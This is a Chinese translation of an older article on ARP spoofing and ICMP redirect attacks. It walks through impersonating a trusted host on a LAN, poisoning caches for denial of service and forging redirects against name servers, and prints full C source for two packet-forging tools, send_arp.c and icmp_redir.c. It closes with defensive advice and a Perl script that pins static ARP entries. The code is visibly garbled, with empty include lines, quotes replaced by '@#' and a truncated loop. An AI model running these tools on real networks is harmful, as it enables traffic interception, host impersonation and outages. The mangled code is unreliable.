ARP&ICMP

对于旁观者来说，事物的缺点和优点往往是同时存在的。我很高兴可以向你们显示两个正规的协议——arp和icmp，当你用一些特殊的方法使用它们的时候，却得到意想不到的结果。

相对于被动攻击（网络监听sniffing）来说，主动攻击使用的并不普遍——许多管理员都拥有一个网络监听工具，帮助他们管理局域网。在你的LAN中，主动攻击将会给你的生活添加光彩和乐趣。你知道，仅仅是一些技术细节使得这些角落有些昏暗不明。那么，我们去看看那里究竟有些是什么。

我们首先描述一下网络欺骗（spoofing）和拒绝服务（DoS-deny of service）。象IP

盲攻击一样，网络攻击常常非常普通并且功能强大，但是对使用者来说，需要做大量的工作（常常是猜），而且难于实行。但是ARP欺骗正好相反，它非常容易使用且方便。

一、ARP欺骗

ARP欺骗往往应用于一个内部网络，我们可以用它来扩大一个已经存在的网络安全漏洞。如果你可以入侵一个子网内的机器，其它的机器安全也将受到ARP欺骗的威胁。

让我们考虑一下的网络结构

IP 10.0.0.1 10.0.0.2 10.0.0.3 10.0.0.4

hostname cat rat dog bat

hw addr AA:AA BB:BB CC:CC DD:DD

所有的主机在以太网中以简单的方式进行连接（没有交换机，智能HUB）。你是cat，你具有root权限，你的目标是侵入dog。而你知道dog信任rat，所以如果你能伪装成rat，那么你就能获得一些意外的东西。

也许你首先想到的是，“为什么我不把我的IP设成rat的，然后...”，这种方式无法工作，无法可靠的工作。如果你将cat的IP设置成10.0.0.2，那么cat将以这个IP回答ARP请求。但是rat也会的。这样你们就进入了一个纯粹的竞争状态，而这场比赛没有赢家。相反的，你会轻易的输掉这场比赛，因为许多工具会立即发现这种IP冲突的现象，抱怨之声随之而来。一些网络交通分析工具还常常对它进行纪录。在网络管理员的日志文件中还会保留一条恶心的纪录（cat的物理地址），这可不是你想要的。你的不到你想要的东西，并且与你的目标背道而驰。

这个东西是你想要的，一个攻击程序——send_arp.c，一个非常有效的工具。正如它的 名字所示，它发送一个ARP包（ARP回答，准确的说：由于这个协议是无状态的，即使在没有请求的时候也可以做出应答。请求同应答是一样的。）向网络上，你可以把这个包做成你想要的样子。

而你想要的只不过是可以去定制源IP与目的IP，还有硬件地址。当你进行ARP欺骗的时候，你不希望你的网卡乱说话，那么你可以用“ifconfig eth0 -arp”

关掉你的ARP协议。当然，无论如何你都需要ARP的信息，手动的构建它并使它发向内核。重要的事你要获得你周围人们的信任。在这个例子中，你希望dog认为rat的硬件地址是AA:AA（cat），所以你发送一个ARP应答，它的源地址是10.0.0.2,源硬件地址是AA:AA,目标地址是10.0.0.3和目标硬件地址是CC:CC。现在，dog完全相信rat的硬件地址是AA:AA。当然dog中缓存会过期，所以它需要更新（重新发送请求）。多长时间发出请求，各个操作系统不同，但是大多来说是40秒钟左右。经常发送ARP应答，这对你来说不会有坏处的。

对于ARP缓存处理方法的不同会带来问题的复杂性。一些操作系统（例如Linux）会用向缓存地址发非广播的ARP请求来要求更新缓存（就象你妻子打电话来看你在不在一样）。这种缓存更新会给你增加麻烦，会使你刚刚伪造的ARP缓存被更改掉，所以必须避免此事发生。经常的向dog发出应答数据，这样它就不会发出请求。正是预防为主。对于rat来说，它根本就没有机会来改变这一切。

所以过程是简单的。首先来设置网络接口别名（ifconfig eth0:1 10.0.0.2），添加rat的IP地址并且打开ARP协议（ifconfig eth0 arp）——你需要设置你的ARP缓存，当没有ARP时，它不会工作。然后在正确的网络接口上设置到dog的路由。再设置dog的ARP缓存。最后，关掉网络接口的ARP功能。这样一切就OK了。

现在，当你用send_arp将毒液注入之后（dog和rat），那么，dog就会认为，你就是rat。一定要记住，要持续不断的向dog和rat发出ARP包。

这种攻击方式就仅仅工作在局域网内（通常的，ARP包是不会路由的）。一个有趣的尝试是，把我们上述试验中dog替换成路由器，如果可以实现的话（我不确定它是否会永远成立，路由器的ARP功能不是那么容易欺骗的），你可以轻易的冒充这个局域网内的机器去欺骗这个Internet世界了。所以目标可以是任何一台机器，但是你要伪装的机器，必须是这个局域网内的。

除了欺骗以外，你还可以用ARP作很多事。蓝天之下，皆可任你遨游。或者，DoS也是一个非常有用的程序。

给rat一个错误的硬件地址，是一个非常有效的让它闭嘴的方法。你可以避免它向一些特殊的机器发出请求（一个ARP缓冲池通常可以容括整个网络的内容，所以你可以在一段时间内有效的防止它向其它机器发出请求）。非常明显目标也可以是一台路由器。干扰缓存需要两步：搅乱被伪装的机器和你不希望它与之通讯的机器。这种方法不是常常奏效，当这台机器发现缓存中没有目标机器时，会主动发出ARP请求。当然你的下一滴毒液会迅速注入，但是你需要经常维持这种状态。一个比较有效的方法是，给rat一个错误的dog硬件地址，这样rat既能保持正常的工作状态，又不会干扰你的活动。同样的，这种方法也依赖于不同的环境，通常的情况是rat会经常的向错误的目标发出各种不同的包，目标会返回ICMP不可抵达信息，从而用一种不正当的方式维持了连接。这种伪装的连接可以推迟缓存的更新时间。在Linux上，我们可以是更新时间从1分钟提升到10分钟。在这一段时间内，你已经可以完成一个TCP连接可以完成的大多数事情了。

这里存在一个有趣被称为“无理ARP”。在这个ARP请求包中，源IP与目的IP是相同的，通常它是经过以太网广播进行发送。一些执行程序认为这是一种特殊情况——系统发出的自身更新信息，并且将这个请求添加在自己的缓存中。这种方式里，影响的是整个网络。这是毋庸置疑的，但这并不是ARP协议的一部分，而是由执行者决定是否作（或是不作），这渐渐的变得不受人欢迎。ARP也可以用来开一些非常专业的笑话。假想一下某人设置了一个中继器或者是一个管道，仅仅是利用自己的机器去骗取两台相邻机器的信任，并且把通讯的包都发给这台机器。如果这台机器仅仅是转发数据，那么谁也不会发现。但是当它仅仅作一些很少的改动时，就会给你添加非常大的麻烦。例如，随机的更改数据包中的几位，这样就会造成校验和错误。数据流好像是毫发无损，却会毫无原因的出现不可预料的错误。

二、ICMP重定向

    另外一个比较有效的并且类似与ARP欺骗的手段是利用另外一个正常的协议——ICMP重定向。这种重定向通常是由你的默认路由器发来的，通告你有一个到达某一网络的更近的路由。最初，既可以通告网络重定向，也可以通告主机的重定向，但是现在，由于网络重定向被否决，仅剩下了主机重定向。正确的制作一个经过完整检查的ICMP包（必须由默认路由器发来，发向重定向机器，新的路由应该是一个网络的直接连接等等），接收者会对系统的路由表进行更新。

    这是ICMP的安全问题。伪装一个路由器的IP地址是简单的，icmp_redir.c正是作的这个工作。RFC声明系统必须遵循这个重定向，除非你是路由器。实际上几乎所有的系统都支持这一点（除了vanilla Linux 2.0.30）。

    ICMP重定向提供了一个非常有力的DoS工具。不像ARP缓存更新，路由表不存在的过期问题。并且不需要在本地网络，你可以发起攻击从任何地方。所以当目标接受了ICMP重定向之后（包确切抵达），目标就不会再和网络上的一些机器进行通讯（是的，并不是所有的机器，但是一些与目标机器不在同一个网络上的机器）。域名服务器会是一个非常好的攻击目标。

/* send_arp.c

这个程序发送ARP包，由使用者提供源/目的IP和网卡地址。编译并运行在Linux环境下，也可以运行在其它的有SOCK_PACKET的Unix系统上。

这个程序是对上述理论的验证，仅此而已。

*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define ETH_HW_ADDR_LEN 6

#define IP_ADDR_LEN 4

#define ARP_FRAME_TYPE 0x0806

#define ETHER_HW_TYPE 1

#define IP_PROTO_TYPE 0x0800

#define OP_ARP_REQUEST 2

#define DEFAULT_DEVICE "eth0"

char usage[]={"send_arp: sends out custom ARP
packet.

usage: send_arp src_ip_addr src_hw_addr targ_ip_addr
tar_hw_addr

"};

struct arp_packet {

u_char targ_hw_addr[ETH_HW_ADDR_LEN];

u_char src_hw_addr[ETH_HW_ADDR_LEN];

u_short frame_type;

u_short hw_type;

u_short prot_type;

u_char hw_addr_size;

u_char prot_addr_size;

u_short op;

u_char sndr_hw_addr[ETH_HW_ADDR_LEN];

u_char sndr_ip_addr[IP_ADDR_LEN];

u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];

u_char rcpt_ip_addr[IP_ADDR_LEN];

u_char padding[18];

};

void die(char *);

void get_ip_addr(struct in_addr*,char*);

void get_hw_addr(char*,char*);

int main(int argc,char** argv){

struct in_addr src_in_addr,targ_in_addr;

struct arp_packet pkt;

struct sockaddr sa;

int sock;

if(argc != 5)die(usage);

sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP));

if(sock<0){

perror("socket");

exit(1);

}

pkt.frame_type = htons(ARP_FRAME_TYPE);

pkt.hw_type = htons(ETHER_HW_TYPE);

pkt.prot_type = htons(IP_PROTO_TYPE);

pkt.hw_addr_size = ETH_HW_ADDR_LEN;

pkt.prot_addr_size = IP_ADDR_LEN;

pkt.op=htons(OP_ARP_REQUEST);

get_hw_addr(pkt.targ_hw_addr,argv[4]);

get_hw_addr(pkt.rcpt_hw_addr,argv[4]);

get_hw_addr(pkt.src_hw_addr,argv[2]);

get_hw_addr(pkt.sndr_hw_addr,argv[2]);

get_ip_addr(&src_in_addr,argv[1]);

get_ip_addr(&targ_in_addr,argv[3]);

memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN);

memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN);

bzero(pkt.padding,18);

strcpy(sa.sa_data,DEFAULT_DEVICE);

if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa))
< 0){

perror("sendto");

exit(1);

}

exit(0);

}

void die(char* str){

fprintf(stderr,"%s
",str);

exit(1);

}

void get_ip_addr(struct in_addr* in_addr,char* str){

struct hostent *hostp;

in_addr->s_addr=inet_addr(str);

if(in_addr->s_addr == -1){

if( (hostp = gethostbyname(str)))

bcopy(hostp->h_addr,in_addr,hostp->h_length);

else {

fprintf(stderr,"send_arp: unknown host %s
",str);

exit(1);

}

}

}

void get_hw_addr(char* buf,char* str){

int i;

char c,val;

for(i=0;i
if( !(c = tolower(*str++)))
die("Invalid hardware address");

if(isdigit(c)) val = c-@#0@#;

else if(c >= @#a@# && c <=
@#f@#) val = c-@#a@#+10;

else die("Invalid hardware
address");

*buf = val << 4;

if( !(c = tolower(*str++)))
die("Invalid hardware address");

if(isdigit(c)) val = c-@#0@#;

else if(c >= @#a@# && c <=
@#f@#) val = c-@#a@#+10;

else die("Invalid hardware
address");

*buf++ |= val;

if(*str == @#:@#)str++;

}

}
　

/* icmp_redir.c

本程序由用户提供的网关地址发送了一个ICMP主机重定向数据包。在Linux2.0.30上测试通过，并且对大多数的Unix机器有效。

这个程序是对上述理论的验证，仅此而已。

*/

　
#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define IPVERSION 4

struct raw_pkt {

struct iphdr ip; /* This is
Linux-style iphdr.

Use BSD-style struct ip if you want */

struct icmphdr icmp;

struct iphdr encl_iphdr;

char encl_ip_data[8];

};

struct raw_pkt* pkt;

void die(char *);

unsigned long int get_ip_addr(char*);

unsigned short checksum(unsigned short*,char);

int main(int argc,char** argv){

struct sockaddr_in sa;

int sock,packet_len;

char usage[]={"icmp_redir: send out custom ICMP host
redirect packet.

yuri volobuev@#97

usage: icmp_redir gw_host targ_host dst_host
dummy_host
"};

char on = 1;

if(argc != 5)die(usage);

if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <
0){

perror("socket");

exit(1);

}

sa.sin_addr.s_addr = get_ip_addr(argv[2]);

sa.sin_family = AF_INET;

packet_len = sizeof(struct raw_pkt);

pkt = calloc((size_t)1,(size_t)packet_len);

pkt->ip.version = IPVERSION;

pkt->ip.ihl = sizeof(struct iphdr) >> 2;

pkt->ip.tos = 0;

pkt->ip.tot_len = htons(packet_len);

pkt->ip.id = htons(getpid() & 0xFFFF);

pkt->ip.frag_off = 0;

pkt->ip.ttl = 0x40;

pkt->ip.protocol = IPPROTO_ICMP;

pkt->ip.check = 0;

pkt->ip.saddr = get_ip_addr(argv[1]);

pkt->ip.daddr = sa.sin_addr.s_addr;

pkt->ip.check = checksum((unsigned short*)pkt,sizeof(struct
iphdr));

pkt->icmp.type = ICMP_REDIRECT;

pkt->icmp.code = ICMP_REDIR_HOST;

pkt->icmp.checksum = 0;

pkt->icmp.un.gateway = get_ip_addr(argv[4]);

memcpy(&(pkt->encl_iphdr),pkt,sizeof(struct
iphdr));

pkt->encl_iphdr.protocol = IPPROTO_IP;

pkt->encl_iphdr.saddr = get_ip_addr(argv[2]);

pkt->encl_iphdr.daddr = get_ip_addr(argv[3]);

pkt->encl_iphdr.check = 0;

pkt->encl_iphdr.check = checksum((unsigned
short*)&(pkt->encl_iphdr),

sizeof(struct iphdr));

pkt->icmp.checksum = checksum((unsigned
short*)&(pkt->icmp),

sizeof(struct raw_pkt)-sizeof(struct
iphdr));

if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on))
< 0) {

perror("setsockopt:
IP_HDRINCL");

exit(1);

}

if(sendto(sock,pkt,packet_len,0,(struct sockaddr*)&sa,sizeof(sa))
< 0){

perror("sendto");

exit(1);

}

exit(0);

}

void die(char* str){

fprintf(stderr,"%s
",str);

exit(1);

}

unsigned long int get_ip_addr(char* str){

struct hostent *hostp;

unsigned long int addr;

if( (addr = inet_addr(str)) == -1){

if( (hostp = gethostbyname(str)))

return
*(unsigned long int*)(hostp->h_addr);

else {

fprintf(stderr,"unknown host %s
",str);

exit(1);

}

}

return addr;

}

unsigned short checksum(unsigned short* addr,char len){

register long sum = 0;

while(len > 1){

sum += *addr++;

len -= 2;

}

if(len > 0) sum += *addr;

while (sum>>16) sum = (sum & 0xffff) + (sum
>> 16);

return ~sum;

}
　

三、解决方案

    对于大多数人来说，ARP是一个隐藏的底层协议。你可以时不时的观察它，但是平常不会有人对它发生兴趣。你可以用arp命令来检查你的ARP缓存，但是当一个网络出现问题的时候，这个并不是我们首先想到的。Windows也存在这个命令，记住这一点也许对你有帮助。但是当一个ARP欺骗通过网关从另一个网络发向你时，恐怕你也无能为力了。同样的，你也可以在你的路由表中发现重定向的路由信息（route 命令，用“D”标志来标明）。

    ARP攻击设计来攻击10Base2以太网。如果网络已一些比较先进的方式进行连接，通常是智能HUB或交换机，那么攻击就很容易被发现，甚至是不可能的（类似于被动攻击）。所以这是一个向你的老板要求更新网络设备的理由。

    这么想起来，ICMP重定向真是一个非常疯狂的想法。首先，一些网络的结构非常简单，对路由表不需要任何添加；其次，大多数的稳定的网络上，仅仅是用手动的办法来更新路由。这并不是一个经常更新的工作，为什么要通过ICMP呢？最后，这个对于你来说是非常危险的，你可以在你的系统上关闭ICMP重定向，这样可以减少同RFC1122的冲突。哎，这可不容易呀！在Linux这种提供源码的机器上，你可以重新编译内核。在Irix6.2和一些其它的系统上，可以“set icmp_dropredirects=1”。这与其它的OS，我也不知道有什么办法。

    时间证明了这个真理：不要信任未确认的主机。否则，网络上帝不会对你施予怜悯的。一些人认为“我有防火墙，我怕谁”，认为一些安全问题对它来说无关紧要。我承认防火墙的作用，但是这并不是经常有效。

  想象这样一个环境，所有的机器都直接与Internet相连，你不得不与你不了解的人共用你的内部网，他们使用的是vanilla SGI 的机器，而他们简直是在到处告诉别人“来攻击我吧，我的买主使它非常简单”（是这样的，那些人认识Unix，从侏罗纪公园...），另外，通向你的路由器由别的机构控制。让我们来到一个标准的网络环境，它会提供我们安全，不受外部的攻击。人们在这里工作，使用电脑。同样，这里的每台机器也存在安全问题。所以，当你下一次提到防火墙的时候，请记住它并不能保护每一个人。

    John Goerzen提供了一个Perl脚本，可以在系统启动时运行。它主要是在Linux机器中维持一个已知的IP地址与硬件地址的缓存，设置标志，以使其不会被更新和改变。配置文件非常简单——IP addr 配 MAC addr，用空格键分割，“#”作为注释。这个脚本仅仅在Linux机器上测试过——在其它平台上的人需要修改arp命令的格式。注意：脚本需要运行在网络接口启动之后，服务和客户运行之前；另外，一些人会在 ARP被锁定时窃取连接。以下是它的脚本：

　
#!/usr/bin/perl

# Program: forcehwaddr

# Program to run ARP to force certain tables.

# Specify filenames to read from on command line, or read
from stdin.

foreach (<>) { # For each input line....

chomp; # Strip if CR/LF

if (/^#/) { next; } # If it@#s a comment, skip it.

if (((($host, $hw) = /s*(.+?)s+(S+)s*/) == 2)
&&

!(/^#/)) {

# The text between the slashes parses
the input line as follows:

# Ignore leading whitespace. (s*)

# Then, start matching and put it into
$host ($host, (.+?))

# Skip over the whitespace after that
(s+)

# Start matching. Continue matching
until end of line or optional

# trailing whitespace.

# Then, the if checks to see that both
a

# host and a hardware address were
matched.

# (2 matches). If not, we skip the

# line (assuming it is blank or
invalid or something).

# The second part of the if checks to
see if the line starts with

# a pound sign; if so, ignore it (as a
comment).

# Otherwise, run the appropriate
command:

printf("Setting IP %-15s to
hardware address %s
", $host, $hw);

system "/usr/sbin/arp -s $host
$hw
";

}

}